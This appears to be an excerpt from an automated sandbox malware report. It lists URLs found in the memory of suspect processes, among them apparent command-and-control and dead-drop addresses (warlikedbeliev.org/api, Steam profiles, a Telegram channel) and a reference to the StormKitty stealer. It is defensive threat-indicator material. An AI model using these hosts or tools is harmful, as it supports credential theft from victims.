Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000031.00000002.3314602796.000001A6A8069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000031.00000002.3314602796.000001A6A8069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000031.00000002.3314602796.000001A6A8069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000035.00000002.3655068517.0000534400AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000035.00000002.3661778665.0000534401190000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000035.00000002.3654547265.0000534400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000035.00000002.3654547265.0000534400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webappx
Source: chrome.exe, 00000035.00000002.3661778665.0000534401190000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njbSD
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/j
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chrome.exe, 00000035.00000002.3661778665.0000534401190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/oglSD
Source: regsvr32.exe, 00000033.00000002.4571793237.00007FF8A8804000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: chrome.exe, 00000035.00000002.3658304065.0000534400D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000035.00000002.3658304065.0000534400D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000035.00000002.3658304065.0000534400D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2d
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Avoiding.com, 00000015.00000002.4579354104.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/
Source: regsvr32.exe, 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000035.00000002.3580752601.000053440000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000035.00000002.3574491861.0000182000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000035.00000002.3574491861.0000182000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000035.00000002.3577310703.0000182000904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000035.00000002.3577310703.0000182000904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000035.00000003.3380532179.0000182000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3577244665.00001820008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_202309180=
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusP
Source: chrome.exe, 00000035.00000002.3577244665.00001820008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: chrome.exe, 00000035.00000002.3661024521.0000534400F9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000035.00000003.3403713634.0000534400FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3653805554.00005344009A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: powershell.exe, 0000001E.00000002.2887929337.0000017CF5B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3314602796.000001A6A8069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000035.00000002.3658384157.0000534400DA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000035.00000002.3660497570.0000534400F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000035.00000003.3403713634.0000534400FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3653805554.00005344009A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: chrome.exe, 00000035.00000003.3403713634.0000534400FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3653805554.00005344009A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 00000035.00000002.3654547265.0000534400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000035.00000002.3654547265.0000534400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3652457669.000053440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: f35b37b5a5.exe, 00000017.00000002.2717268834.0000000001653000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702568906.0000000001653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/_5e
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: f35b37b5a5.exe, 00000017.00000002.2717268834.0000000001653000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702568906.0000000001653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Avoiding.com, 00000015.00000003.3246972638.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3247425718.00000000041BF000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3253372198.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3254803204.00000000041BC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3254450028.0000000001091000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3247160180.0000000004234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
Source: Avoiding.com, 00000015.00000003.3247160180.0000000004234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: f35b37b5a5.exe, 00000017.00000003.2705697964.0000000001675000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900Jg
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: f35b37b5a5.exe, 00000017.00000003.2705998716.00000000016A5000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2705697964.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: f35b37b5a5.exe, 00000017.00000003.2705697964.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: f35b37b5a5.exe, 00000017.00000003.2702568906.000000000164D000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Avoiding.com, 00000015.00000003.3246972638.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3247425718.00000000041BF000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3253372198.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3254803204.00000000041BC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3254450028.0000000001091000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 00000015.00000003.3247160180.0000000004234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbk
Source: Avoiding.com, 00000015.00000003.3247160180.0000000004234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
Source: SQ1NgqeTQy.exe, 00000000.00000003.2119604771.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2108439032.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2108324381.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2089889800.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2063179844.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2108518611.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2133245964.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/%kp
Source: SQ1NgqeTQy.exe, 00000000.00000003.2123776546.0000000001004000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2119604771.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/T
Source: SQ1NgqeTQy.exe, 00000000.00000003.2133245964.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api
Source: SQ1NgqeTQy.exe, 00000000.00000003.2133103490.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2148659135.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apia
Source: SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/uj
Source: SQ1NgqeTQy.exe, 00000000.00000003.2132721826.0000000005713000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/api
